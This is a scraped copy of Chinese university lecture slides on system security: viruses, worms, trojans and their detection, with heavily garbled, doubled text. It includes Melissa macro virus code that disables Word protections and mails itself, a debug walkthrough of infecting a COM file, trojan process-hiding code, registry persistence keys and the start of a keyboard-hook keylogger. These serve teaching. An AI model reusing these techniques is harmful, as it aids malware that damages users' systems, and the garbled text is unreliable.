密码学sec-chap system security.ppt

《密码学sec-chap system security.ppt》由会员分享，可在线阅读，更多相关《密码学sec-chap system security.ppt（80页珍藏版）》请在taowenge.com淘文阁网|工程机械CAD图纸|机械工程制图|CAD装配图下载|SolidWorks_CaTia_CAD_UG_PROE_设计图分享下载上搜索。

1、系统安全系统安全木马和病毒蠕虫木马和病毒蠕虫区分病毒蠕虫和木马区分病毒蠕虫和木马病毒蠕虫木马存在形式寄生独立个体独立个体复制形式插入宿主自身的拷贝自身的拷贝触发机制宿主程序运行程序自身Cracker传染机制宿主程序运行系统存在漏洞系统存在漏洞影响重点文件系统网络性能、系统性能个人信息防治措施从文件种删除PatchPatch，查找1.1.病毒的基本概念病毒的基本概念计算机病毒（蛀虫），是指某些人有意编制的计算机病毒（蛀虫），是指某些人有意编制的具有自我繁殖、相互传染和破坏作用的计算机程具有自我繁殖、相互传染和破坏作用的计算机程序。序。什么是病毒什么是病毒1.1.病毒的基本概念病毒的基本概念 统计

2、表明，在统计表明，在20032003年的上半年，我国计算机病毒年的上半年，我国计算机病毒感染率约有感染率约有85%85%，并呈现出继续上升趋势。在，并呈现出继续上升趋势。在20012001年，年，我国有我国有73%73%的计算机曾感染病毒，到了的计算机曾感染病毒，到了20022002年，这个数年，这个数字上升到近字上升到近84%84%，20032003上半年又增加到上半年又增加到85%85%。当前的网络入侵主要来自于蠕虫病毒。病毒制造者最厉害的地方：匈牙利病毒泛滥的地方：菲律宾病毒制造者的年龄：1718岁 一些统计数据一些统计数据1.1.病毒蠕虫的基本概念病毒蠕虫的基本概念它是一段（寄生）的代

3、码它是一段（寄生）的代码!基本原理基本原理2 2.病毒蠕虫病毒蠕虫的原理的原理复制复制触发触发破坏破坏病毒的病毒的3个基本手段个基本手段2 2.病毒的原理病毒的原理引导病毒引导病毒 (引导程序引导程序)DosDos病毒病毒 （ComCom文件，文件，EXEEXE文件）文件）WindowsWindows病毒病毒 （PEPE文件）文件）脚本语言脚本语言 （Word,HTMLWord,HTML）几种不同分类的病毒原理几种不同分类的病毒原理2 2.病毒的原理病毒的原理VBVB，VBScriptVBScript，VBAVBAC C语言语言汇编汇编机器码机器码所涉及到的程序语言所涉及到的程序语言2 2.病

4、毒的原理病毒的原理引导病毒原理启动顺序引导病毒原理启动顺序POSTPOST通电自检通电自检 ；计算机接通电源后，系统将有一个对；计算机接通电源后，系统将有一个对内部各个设备进行检查的过程，完整的内部各个设备进行检查的过程，完整的POSTPOST自检将包括自检将包括CPUCPU、640K640K基本内存、基本内存、1M1M以上的扩展内存、以上的扩展内存、ROMROM、主板、主板、CMOSCMOS内存、串并口、显示卡、软硬碟子系统及键盘测试。内存、串并口、显示卡、软硬碟子系统及键盘测试。自检中若发现问题，系统将给出提示信息或鸣笛警告。自检中若发现问题，系统将给出提示信息或鸣笛警告。BIOSBIOS

5、将按照系统将按照系统CMOSCMOS设置中的启动顺序搜寻软硬盘驱动设置中的启动顺序搜寻软硬盘驱动器及器及CDROMCDROM、网络服务器等有效的驱动程序、网络服务器等有效的驱动程序读入操作系统引导记录，然后将系统控制权交给引导记读入操作系统引导记录，然后将系统控制权交给引导记录，由引导记录完成系统的启动。录，由引导记录完成系统的启动。2 2.病毒的原理病毒的原理引导病毒原理硬盘主引导区引导病毒原理硬盘主引导区(1)主引导程序；主引导程序；(2)四个分区表；四个分区表；(3)主引导记录有效标志字主引导记录有效标志字2 2.病毒的原理病毒的原理引导病毒原理硬盘引导程序引导病毒原理硬盘引导程序000

6、0FACLI;屏蔽中断屏蔽中断000133C0XORAX,AX00038ED0MOVSS,AX;(SS)=0000H0005BC007CMOVSP,7C00;(SP)=7C00H00088BF4MOVSI,SP;(SI)=7C00H000A50PUSHAX000B07POPES;(ES)=0000H000C50PUSHAX000D1FPOPDS;(DS)=0000H000EFBSTI000FFCCLD0010BF0006MOVDI,06000013B90001MOVCX,0100;共共512字节字节0016F2REPNZ0017A5MOVSW;主引导程序把自己从主引导程序把自己从0000:7C

7、000000:7C00处搬到处搬到0000:06000000:0600处处,为为DosDos分分区的引导程序腾出空间区的引导程序腾出空间2 2.病毒的原理病毒的原理引导病毒原理硬盘引导程序引导病毒原理硬盘引导程序0018 EA1D060000 JMP 0000:061D;0018 EA1D060000 JMP 0000:061D;跳到跳到0000:061D0000:061D处继续执行处继续执行,实际上就是实际上就是;执行下面的执行下面的MOVMOV指令指令(001D(001D偏移处偏移处)001D BEBE07 MOV SI,07BE;07BE-0600=01BE,01BE001D BEBE0

8、7 MOV SI,07BE;07BE-0600=01BE,01BE是分区表的首址是分区表的首址0020 B304 MOV BL,04;0020 B304 MOV BL,04;分区表最多分区表最多4 4项项,即最多即最多4 4个分区个分区0022 803C80 CMP BYTE PTR SI,80;80H0022 803C80 CMP BYTE PTR SI,80;80H表示活动分区表示活动分区0025 740E JZ 0035;0025 740E JZ 0035;找到活动分区则跳走找到活动分区则跳走0027 803C00 CMP BYTE PTR SI,00;00H0027 803C00 CM

9、P BYTE PTR SI,00;00H为有效分区的标志为有效分区的标志002A 751C JNZ 0048;002A 751C JNZ 0048;既非既非80H80H亦非亦非00H00H则分区表无效则分区表无效002C 83C610 ADD SI,+10;002C 83C610 ADD SI,+10;下一个分区表项下一个分区表项,每项每项1616字节字节002F FECB DEC BL;002F FECB DEC BL;循环计数减一循环计数减一0031 75EF JNZ 0022;0031 75EF JNZ 0022;检查下一个分区表项检查下一个分区表项0033 CD18 INT 18;40

10、033 CD18 INT 18;4个都不能引导则进入个都不能引导则进入ROM BasicROM Basic0035 8B14 MOV DX,SI0035 8B14 MOV DX,SI0037 8B4C02 MOV CX,SI+02;0037 8B4C02 MOV CX,SI+02;取活动分区的引导扇区的面取活动分区的引导扇区的面,柱面柱面,扇区扇区003A 8BEE MOV BP,SI;003A 8BEE MOV BP,SI;然后继续检查后面的分区表项然后继续检查后面的分区表项003C 83C610 ADD SI,+10003C 83C610 ADD SI,+10003F FECB DEC B

11、L003F FECB DEC BL0041 741A JZ 005D;40041 741A JZ 005D;4个都查完则去引导活动分区个都查完则去引导活动分区 0043 803C00 CMP BYTE PTR SI,00;00H0043 803C00 CMP BYTE PTR SI,00;00H为分区有效标志为分区有效标志0046 74F4 JZ 003C;0046 74F4 JZ 003C;此分区表项有效则继续查下一个此分区表项有效则继续查下一个0048 BE8B06 MOV SI,068B;068B-0600=018B,0048 BE8B06 MOV SI,068B;068B-0600=0

12、18B,取取 无效分区无效分区 字符串字符串2 2.病毒的原理病毒的原理引导病毒原理硬盘引导程序引导病毒原理硬盘引导程序005D BF0500 MOV DI,0005;005D BF0500 MOV DI,0005;读入活动分区的引导扇读入活动分区的引导扇,最多试读最多试读5 5次次0060 BB007C MOV BX,7C000060 BB007C MOV BX,7C000063 B80102 MOV AX,02010063 B80102 MOV AX,02010066 57 PUSH DI0066 57 PUSH DI0067 CD13 INT 13;0067 CD13 INT 13;读读

13、0069 5F POP DI0069 5F POP DI006A 730C JNB 0078;006A 730C JNB 0078;读盘成功则跳走读盘成功则跳走006C 33C0 XOR AX,AX006C 33C0 XOR AX,AX006E CD13 INT 13;006E CD13 INT 13;读失败则复位磁盘读失败则复位磁盘0070 4F DEC DI0070 4F DEC DI0071 75ED JNZ 0060;0071 75ED JNZ 0060;不到不到5 5次则再试读次则再试读0073 BEA306 MOV SI,06A3;06A3-0600=00A3,0073 BEA30

14、6 MOV SI,06A3;06A3-0600=00A3,即即Error loadingError loading串串0076 EBD3 JMP 004B;0076 EBD3 JMP 004B;去显示字符串去显示字符串,然后进入死循环然后进入死循环0078 BEC206 MOV SI,06C2;06C2-0600=00C2,0078 BEC206 MOV SI,06C2;06C2-0600=00C2,即即Missing.Missing.串串0076 EBD3 JMP 004B;0076 EBD3 JMP 004B;去显示字符串去显示字符串,然后进入死循环然后进入死循环0078 BEC206 M

15、OV SI,06C2;06C2-0600=00C2,0078 BEC206 MOV SI,06C2;06C2-0600=00C2,即即Missing.Missing.串串007B BFFE7D MOV DI,7DFE;7DFE-7C00=01FE,007B BFFE7D MOV DI,7DFE;7DFE-7C00=01FE,即活动分区的引导扇区的最后两字节的首址即活动分区的引导扇区的最后两字节的首址2 2.病毒的原理病毒的原理引导病毒原理病毒技术引导病毒原理病毒技术1 1、减少系统内存量计数，为自己保留空间减少系统内存量计数，为自己保留空间2 2、修改中断向量，为自己埋伏触发机制、修改中断向量

16、，为自己埋伏触发机制3 3、将病毒代码转移到保留的空间中、将病毒代码转移到保留的空间中4 4、有机会触发的时候，检查是否有磁盘，复制、有机会触发的时候，检查是否有磁盘，复制自己到其他磁盘自己到其他磁盘5 5、读出被病毒隐藏的原正常、读出被病毒隐藏的原正常DOSDOS引导区并执行。引导区并执行。2 2.病毒的原理病毒的原理Com病毒原理病毒技术病毒原理病毒技术COM文件是内存映像文件是内存映像2 2.病毒的原理病毒的原理Com病毒原理病毒技术病毒原理病毒技术手动修改一个文件的例子，关键步骤：手动修改一个文件的例子，关键步骤：编写自己的代码（结束时恢复原来的代码）编写自己的代码（结束时恢复原来的代

17、码）修改程序头，使之跳转到自己的代码修改程序头，使之跳转到自己的代码修改计数器的值，将文件保存（包括自己的代码）。修改计数器的值，将文件保存（包括自己的代码）。告成，执行试试！告成，执行试试！2 2.病毒的原理病毒的原理D:debug -r 显示当前寄存器值显示当前寄存器值AX=0000 BX=0000 CX=2967 DX=0000 SP=FFFE BP=0000 SI=0000 DI=0000DS=148C ES=148C SS=148C CS=148C IP=0100 NV UP EI PL NZ NA PO NC148C:0100 E85A10 CALL 115D-a cs:2A67

18、将附加的代码汇编到程序地址空间的末端将附加的代码汇编到程序地址空间的末端148C:2A67 MOV AH,09 中断中断21的的9号功能，显示字串号功能，显示字串148C:2A69 MOV DX,2A83 显示字串的地址显示字串的地址148C:2A6C INT 21148C:2A6E MOV BYTE PTR 0100,E8 恢复原始恢复原始more程序入口程序入口148C:2A73 MOV BYTE PTR 0101,5A 恢复原始恢复原始more程序入口程序入口148C:2A78 MOV BYTE PTR 0102,10 恢复原始恢复原始more程序入口程序入口148C:2A7D PUSH

19、 CS 设置返回段地址设置返回段地址2 2.病毒的原理病毒的原理148C:2A7E MOV SI,0100 设置返回段内偏移设置返回段内偏移148C:2A81 PUSH SI148C:2A82 RETF返回原始返回原始more程序入口程序入口148C:2A83 db30 字符字符0的的Asc码值码值148C:2A84 db30 字符字符0的的Asc码值码值148C:2A85 db30148C:2A86 db30148C:2A87 db30148C:2A88 db30148C:2A89 db30148C:2A8A db30148C:2A8B db302 2.病毒的原理病毒的原理148C:2A8C

20、 db30148C:2A8D db24 字符串结束标志字符串结束标志148C:2A8E -a cs:0100 修改原始修改原始more程序入口，跳转到自己添加的代码程序入口，跳转到自己添加的代码148C:0100 JMP 2A67 148C:0103 -r cx 修改修改CX寄存器为程序现在的长度寄存器为程序现在的长度CX*:298E -w 写入文件写入文件Writing 298E bytes-q 修改完毕，退出。修改完毕，退出。2 2.病毒的原理病毒的原理Windows病毒原理病毒技术病毒原理病毒技术PE文件格式：文件格式：PortableExecutable（可（可移植的执行移植的执行）D

21、OSMZheaderDOSstubPEheaderSectiontableSection1Section2Section.Sectionn2 2.病毒的原理病毒的原理宏病毒原理病毒技术宏病毒原理病毒技术主要利用主要利用MSMS的自动化技术，的自动化技术，VBSVBS。如何复制？如何复制？Set so=Set so=CreateObject(CreateObject(“Scripting.FileSystemObjectScripting.FileSystemObject”)ScriptFullNameScriptFullName:文件本身文件本身So.GetFile(WScript.Scrip

22、tFullName).Copy(So.GetFile(WScript.ScriptFullName).Copy(“c:new.vbsc:new.vbs”)3 3.典型病毒分析典型病毒分析“Melissa”病毒原理病毒原理Word宏病毒3 3.典型病毒分析典型病毒分析“Melissa”病毒原理病毒原理Word宏病毒3 3.典型病毒分析典型病毒分析“Melissa”病毒原理病毒原理降低Word9.0宏病毒防护等级，修改一些配置IfSystem.PrivateProfileString(,HKEY_CURRENT_USERSoftwareMicrosoftOffice9.0WordSecurity,

23、Level)ThenCommandBars(Macro).Controls(Security.).Enabled=FalseSystem.PrivateProfileString(,HKEY_CURRENT_USERSoftwareMicrosoftOffice9.0WordSecurity,Level)=1&ElseCommandBars(Tools).Controls(Macro).Enabled=FalseOptions.ConfirmConversions=FalseOptions.VirusProtection=FalseOptions.SaveNormalPrompt=FalseE

24、ndIf3 3.典型病毒分析典型病毒分析“Melissa”病毒原理病毒原理发送邮件的代码SetUngaDasOutlook=CreateObject(Outlook.Application)SetDasMapiName=UngaDasOutlook.GetNameSpace(MAPI)将整个文件作为附件发送BreakUmOffASlice.Attachments.AddActiveDocument.FullName3 3.典型病毒分析典型病毒分析“Melissa”病毒原理病毒原理修改模板名称，感染标志SetADI1=ActiveDocument.VBProject.VBComponents.I

25、tem(1)SetNTI1=NormalTemplate.VBProject.VBComponents.Item(1)NTCL=NTI1.CodeModule.CountOfLinesADCL=ADI1.CodeModule.CountOfLinesBGN=2IfADI1.NameMelissaThenIfADCL0ThenADI1.CodeModule.DeleteLines1,ADCLSetToInfect=ADI1ADI1.Name=MelissaDoAD=TrueEndIf3 3.典型病毒分析典型病毒分析“Melissa”病毒原理病毒原理自我复制，先删除，后复制IfDoAD=TrueT

26、henDoWhileNTI1.CodeModule.Lines(1,1)=NTI1.CodeModule.DeleteLines1LoopToInfect.CodeModule.AddFromString(PrivateSubDocument_Open()DoWhileNTI1.CodeModule.Lines(BGN,1)ToInfect.CodeModule.InsertLinesBGN,NTI1.CodeModule.Lines(BGN,1)BGN=BGN+1LoopEndIf4.4.病毒的防治病毒的防治特征码扫描法：特征码扫描法：特征码扫描法是分析出病毒的特征病毒码并集中特征码扫描法是

27、分析出病毒的特征病毒码并集中存放于病毒代码库文件中，在扫描时将扫描对象存放于病毒代码库文件中，在扫描时将扫描对象与特征代码库比较，如有吻合则判断为染上病毒。与特征代码库比较，如有吻合则判断为染上病毒。该技术实现简单有效，安全彻底；但查杀病毒滞该技术实现简单有效，安全彻底；但查杀病毒滞后，并且庞大的特征码库会造成查毒速度下降；后，并且庞大的特征码库会造成查毒速度下降；如何检测病毒：主要的如何检测病毒：主要的3种技术种技术4.4.病毒的防治病毒的防治虚拟执行技术：虚拟执行技术：该技术通过虚拟执行方法查杀病毒，可以对付加密、变该技术通过虚拟执行方法查杀病毒，可以对付加密、变形、异型及病毒生产机生产的

28、病毒，具有如下特点：形、异型及病毒生产机生产的病毒，具有如下特点：在查杀病毒时在机器虚拟内存中模拟出一个在查杀病毒时在机器虚拟内存中模拟出一个“指令执行指令执行虚拟机器虚拟机器”。在虚拟机环境中虚拟执行（不会被实际执行）可疑带毒在虚拟机环境中虚拟执行（不会被实际执行）可疑带毒文件。文件。在执行过程中，从虚拟机环境内截获文件数据，如果含在执行过程中，从虚拟机环境内截获文件数据，如果含有可疑病毒代码，则杀毒后将其还原到原文件中，从而有可疑病毒代码，则杀毒后将其还原到原文件中，从而实现对各类可执行文件内病毒实现对各类可执行文件内病毒的查杀的查杀。如何检测病毒：主要的如何检测病毒：主要的3种技术种技术

29、4.4.病毒的防治病毒的防治文件实时监控技术：文件实时监控技术：通通过过利利用用操操作作系系统统底底层层接接口口技技术术，对对系系统统中中的的所所有有类类型型文文件件或或指指定定类类型型的的文文件件进进行行实实时时的的行行为为监监控控，一一旦旦有有病病毒毒传传染染或或发发作作时时就就及及时时报报警警。从从而而实实现现了了对对病病毒毒的的实实时时、永永久久、自自动动监监控控。这这种种技技术术能能够够有有效效控控制制病病毒毒的的传传播播途途径径，但但是是这这种种技技术术的的实实现现难难度度较较大大，系系统统资资源源的的占占用用率率也会有所降低。也会有所降低。如何检测病毒：主要的如何检测病毒：主要的

30、3种技术种技术4.4.病毒的防治病毒的防治1、如你的电脑感染该病毒，请在windwos下按CTRL+ALT+DEL查看内存中是否有wscript这个文件，如有，你已感染。请点击该文件，并将该文件“结束任务”。2、请进入c:windowssystem中，运行MSCONFIG.EXE进入“启动”菜单，将所有的后缀为*.vbs的文件选择为禁用状态。3、“确定”后重新启动电脑。（切记：需保证内存中无wscript这个文件，才可关闭）4、删除含LOVE-LETTER-FOR-YOU.TXT附件的mail.利用我们的知识手动清除病毒利用我们的知识手动清除病毒ILoveYou4.4.病毒的防治病毒的防治最好

31、启动到DOS，实在不行，在Windows下面:1、结束所有krn132.exe进程。2、删除“WINNTSystem32krn132.exe”及临时文件夹中的所有副本。3、删除或禁用“Krn132”服务。4、在注册表 HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun中 添加以下键值：=cmd/c attrib-s-h-r WINNTSystem32Wqk.dll&del WINNTSystem32Wqk.dll（系统启动时，这个键值是优先于上面提到的“AppInit_DLLs”载入的）然后重启系统，运行反病毒软件查杀整个硬盘

32、。5、正常启动系统，删除相关注册表键值。只要可能，强烈建议格式化硬盘后重装系统，或用备份系统恢复。利用我们的知识手动清除病毒利用我们的知识手动清除病毒求职信求职信5 5.木马程序的基本概念木马程序的基本概念木马的历史含义：希腊神话木马的历史含义：希腊神话Trojan horseTrojan horse它是一种基于远程控制的黑客工具、非法程序，具有隐蔽它是一种基于远程控制的黑客工具、非法程序，具有隐蔽性和非授权性的特点。该非法程序在用户不知情的情况下性和非授权性的特点。该非法程序在用户不知情的情况下被执行。被执行。什么是木马程序什么是木马程序5 5.木马程序的基本概念木马程序的基本概念从从Uni

33、x和网络结合的时候就开始了，功能相对简单，主要和网络结合的时候就开始了，功能相对简单，主要形式是在程序中插入一段代码（和病毒有的相似），操作形式是在程序中插入一段代码（和病毒有的相似），操作不方便。不方便。现在在现在在Windows系统中泛滥，利用系统中泛滥，利用Windows的一些漏洞和的一些漏洞和网络的普及变得功能强大到可以远程控制计算机，界面友网络的普及变得功能强大到可以远程控制计算机，界面友好，操作容易。好，操作容易。木马程序的历史木马程序的历史5 5.木马程序的基本概念木马程序的基本概念隐蔽性：所有恶意程序都应该具有的特征隐蔽性：所有恶意程序都应该具有的特征非授权操作非授权操作：并没

34、有执行被授权的操作：并没有执行被授权的操作悄悄运行：在用户不知情的情况下运行悄悄运行：在用户不知情的情况下运行木马程序的特点木马程序的特点5 5.木马程序的基本概念木马程序的基本概念目前主要的两种传播方式是：目前主要的两种传播方式是：Email：通过：通过Email以附件的形式将木马程序传播出去，收以附件的形式将木马程序传播出去，收到到Email的用户中计的风险很大。的用户中计的风险很大。恶意的软件下载：一些恶意的软件下载站点提供一些比较恶意的软件下载：一些恶意的软件下载站点提供一些比较诱人的软件或者是常用的工具软件下载，其实是恶意的木诱人的软件或者是常用的工具软件下载，其实是恶意的木马程序。

35、马程序。木马程序的传播方式木马程序的传播方式5 5.木马程序的基本概念木马程序的基本概念客户服务器程序客户服务器程序木马程序的基本结构木马程序的基本结构6 6.木马程序的例子木马程序的例子Netspy网络精灵网络精灵7 7.木马程序常用的技术木马程序常用的技术常用技术分类常用技术分类隐藏技术隐藏技术触发技术触发技术系统信息和个人敏感信息获取技术系统信息和个人敏感信息获取技术计算机管理技术计算机管理技术网络技术网络技术7 7.木马程序的主要编程技术木马程序的主要编程技术进程：运行一个进程：运行一个Windows应用程序会在系统之中产生一个应用程序会在系统之中产生一个进程，每个进程，分别对应了一个

36、不同的进程，每个进程，分别对应了一个不同的PID（进程标识进程标识符）这个进程会被系统分配一个虚拟的内存空间地址段，符）这个进程会被系统分配一个虚拟的内存空间地址段，一切相关的程序操作，都会在这个虚拟的空间中进行。一切相关的程序操作，都会在这个虚拟的空间中进行。线程：一个进程，可以存在一个或多个线程，线程之间同线程：一个进程，可以存在一个或多个线程，线程之间同步执行多种操作，一般地，线程之间是相互独立的，当一步执行多种操作，一般地，线程之间是相互独立的，当一个线程发生错误的时候，并不一定会导致整个进程的崩溃。个线程发生错误的时候，并不一定会导致整个进程的崩溃。服务：一个进程当以服务的方式工作的

37、时候，它将会在后服务：一个进程当以服务的方式工作的时候，它将会在后台工作，不会出现在任务列表中，但是，在台工作，不会出现在任务列表中，但是，在WindowsNT/2000下，仍然可以通过服务管理器检查任何的服务程下，仍然可以通过服务管理器检查任何的服务程序是否被启动运行。序是否被启动运行。隐藏技术隐藏技术3个概念个概念7 7.木马程序的主要编程技术木马程序的主要编程技术伪隐藏技术：木马服务仍然以进程的形式在系统伪隐藏技术：木马服务仍然以进程的形式在系统中运行，只不过，不会出现在任务列表中。看不见中运行，只不过，不会出现在任务列表中。看不见进程进程隐藏技术：将木马服务嵌入到系统正常运行所需隐藏技

38、术：将木马服务嵌入到系统正常运行所需的进程空间中去。不使用进程的进程空间中去。不使用进程隐藏技术隐藏技术隐藏技术的细分隐藏技术的细分7 7.木马程序的主要编程技术木马程序的主要编程技术在在Windows98系统中，将木马服务进程注册为服务。系统中，将木马服务进程注册为服务。WINAPIWinMain(HINSTANCE,HINSTANCE,LPSTR,int)tryDWORDdwVersion=GetVersion();/取得取得Windows的版本号的版本号if(dwVersion=0 x80000000)/Windows9x隐藏任务列表隐藏任务列表int(CALLBACK*rsp)(DWO

39、RD,DWORD);HINSTANCEdll=LoadLibrary(“KERNEL32.DLL”);/装入装入ERNEL32.DLLrsp=(int(CALLBACK*)(DWORD,DWORD)GetProcAddress(dll,“RegisterServiceProcess”);/找到找到RegisterServiceProcess的入口的入口rsp(NULL,1);/注册服务注册服务FreeLibrary(dll);/释放释放DLL模块模块return0;隐藏技术隐藏技术伪隐藏技术伪隐藏技术17 7.木马程序的主要编程技术木马程序的主要编程技术用用VisualBasic程序。程序。P

40、ublicDeclareFunctionRegisterServiceProcessLibkernel32(ByValProcessIDAsLong,ByValServiceFlagsAsLong)AsLongPublicDeclareFunctionGetCurrentProcessIdLibkernel32()AsLongPrivateSubForm_Load()RegisterServiceProcessGetCurrentProcessId,1(注册系统服务注册系统服务)EndSubPrivateSubForm_Unload()RegisterServiceProcessGetCurr

41、entProcessId,0(取消系统服务取消系统服务)EndSub隐藏技术隐藏技术伪隐藏技术伪隐藏技术17 7.木马程序的主要编程技术木马程序的主要编程技术API的拦截技术：建立一个后台的系统钩子，拦截的拦截技术：建立一个后台的系统钩子，拦截PSAPI的的EnumProcessModules等相关的函数来实现对进程和服务的遍历等相关的函数来实现对进程和服务的遍历调用的控制，当检测到进程调用的控制，当检测到进程ID（PID）为木马程序的服务器端）为木马程序的服务器端进程的时候直接跳过，这样就实现了进程的隐藏。进程的时候直接跳过，这样就实现了进程的隐藏。例如，金山词霸等软件，就是使用了类似的方法

42、，拦截了例如，金山词霸等软件，就是使用了类似的方法，拦截了TextOutA,TextOutW函数，来截获屏幕输出，实现即时翻译的。函数，来截获屏幕输出，实现即时翻译的。同样，这种方法也可以用在进程隐藏上。同样，这种方法也可以用在进程隐藏上。隐藏技术隐藏技术伪隐藏技术伪隐藏技术27 7.木马程序的主要编程技术木马程序的主要编程技术Windows系统的另一种系统的另一种“可执行文件可执行文件”-DLL：DLL是是DynamicLinkLibrary（动态链接库（动态链接库），），DLL文件是文件是Windows的基础，的基础，因为所有的因为所有的API函数都是在函数都是在DLL中实现的。中实现的。

43、DLL文件没有程序逻辑，是由多文件没有程序逻辑，是由多个功能函数构成，它并不能独立运行，一般都是由进程加载并调用的。所以个功能函数构成，它并不能独立运行，一般都是由进程加载并调用的。所以在进程列表中并不会出现在进程列表中并不会出现DLL，假设我们编写了一个木马，假设我们编写了一个木马DLL，并且通过，并且通过别的进程来运行它，那么无论是入侵检测软件还是进程列表中，都只会出现别的进程来运行它，那么无论是入侵检测软件还是进程列表中，都只会出现那个进程而并不会出现木马那个进程而并不会出现木马DLL，如果那个进程是可信进程，（例如资源，如果那个进程是可信进程，（例如资源管理器管理器Explorer.e

44、xe，没人会怀疑它是木马吧？）那么我们编写的，没人会怀疑它是木马吧？）那么我们编写的DLL作为作为那个进程的一部分，也将成为被信赖的一员而为所欲为那个进程的一部分，也将成为被信赖的一员而为所欲为。隐藏技术隐藏技术2不使用进程不使用进程7 7.木马程序的主要编程技术木马程序的主要编程技术运行运行DLL文件最简单的方法是利用文件最简单的方法是利用Rundll32.exe。Rundll/Rundll32是是Windows自带的动态链接库工具，可以用来自带的动态链接库工具，可以用来在命令行下执行动态链接库中的某个函数，其中在命令行下执行动态链接库中的某个函数，其中Rundll是是16位位而而Rundl

45、l32是是32位的（分别调用位的（分别调用16位和位和32位的位的DLL文件）。文件）。Rundll32的使用方法如下：的使用方法如下：Rundll32.exeDllFileNameFuncName隐藏技术隐藏技术2不使用进程不使用进程4 4.木马程序的主要编程技术木马程序的主要编程技术使用使用Rundll32.exe运行木马运行木马DLL：系统只能检查出：系统只能检查出Rundll32进程。进程。特洛伊式的特洛伊式的DLL替换法：使用木马的替换法：使用木马的DLL替换系统替换系统中正常的中正常的DLL。动态嵌入技术：将自己的木马代码嵌入到正在运行动态嵌入技术：将自己的木马代码嵌入到正在运行中

46、进程的技术。中进程的技术。隐藏技术隐藏技术2不使用进程不使用进程7 7.木马程序的主要编程技术木马程序的主要编程技术触发技术触发技术修改注册表修改注册表修改注册表的哪些地方？修改注册表的哪些地方？老地方老地方。HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunOnceHKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunHKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunServiceHKEY_CU

47、RRENT_USERSoftwareMicrosoftWindowsCurrentVersionRunHKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRunOnce7 7.木马程序的主要编程技术木马程序的主要编程技术计算机管理技术计算机管理技术-锁定鼠标锁定鼠标锁定鼠标锁定鼠标ClipCursor(lpRectAsRECT)可以将指针限制到指定区可以将指针限制到指定区域域,或者用或者用ShowCursor(FALSE)把鼠标隐藏起来也可以把鼠标隐藏起来也可以注注:RECT是一个矩形是一个矩形,定义如下定义如下:TypeRECTLef

48、tAsLongTopAsLongRightAsLongBottomAsLongEndType7 7.木马程序常用的技术木马程序常用的技术系统基本信息系统基本信息/CPU信息信息LPSYSTEM_INFOmysys;mysys=newSYSTEM_INFO;GetSystemInfo(mysys);mysys-dwNumberOfProcessors/CPU个数个数mysys-wProcessorLevel/CPU档次档次7 7.木马程序常用的技术木马程序常用的技术键盘消息键盘消息钩子程序：钩子程序的本质是一段用以处理系钩子程序：钩子程序的本质是一段用以处理系统消息的程序，通过系统调用，将其挂入

49、系统统消息的程序，通过系统调用，将其挂入系统消队列。钩子的种类有很多，每种钩子可以截消队列。钩子的种类有很多，每种钩子可以截获并处理相应的消息，每当特定的消息发出，获并处理相应的消息，每当特定的消息发出，在到达目的窗口之前，钩子程序先行截获该消在到达目的窗口之前，钩子程序先行截获该消息、得到对此消息的控制权。此时在钩子函数息、得到对此消息的控制权。此时在钩子函数中就可以对截获的消息进行加工处理，甚至可中就可以对截获的消息进行加工处理，甚至可以强制结束消息的传递。以强制结束消息的传递。7 7.木马程序常用的技术木马程序常用的技术键盘消息写钩子程序键盘消息写钩子程序1、申明钩子函数、申明钩子函数L

50、RESULTCALLBACKHookFun(intnCode,WPARAMwParam,LPARAMlParam);2、系统调用将钩子函数挂接到系统消息出来队列、系统调用将钩子函数挂接到系统消息出来队列Hook=(HHOOK)SetWindowsHookEx(WH_KEYBOARD,/消息类型消息类型(HOOKPROC)LauncherHook,/钩子函数地址钩子函数地址NULL,/所在模块的句柄所在模块的句柄0);/目标线程的目标线程的ID7 7.木马程序常用的技术木马程序常用的技术键盘消息钩子程序例子键盘消息钩子程序例子注意：注意：1、捕获在任意窗口上的键盘输入，这就需要采用全局钩捕获在任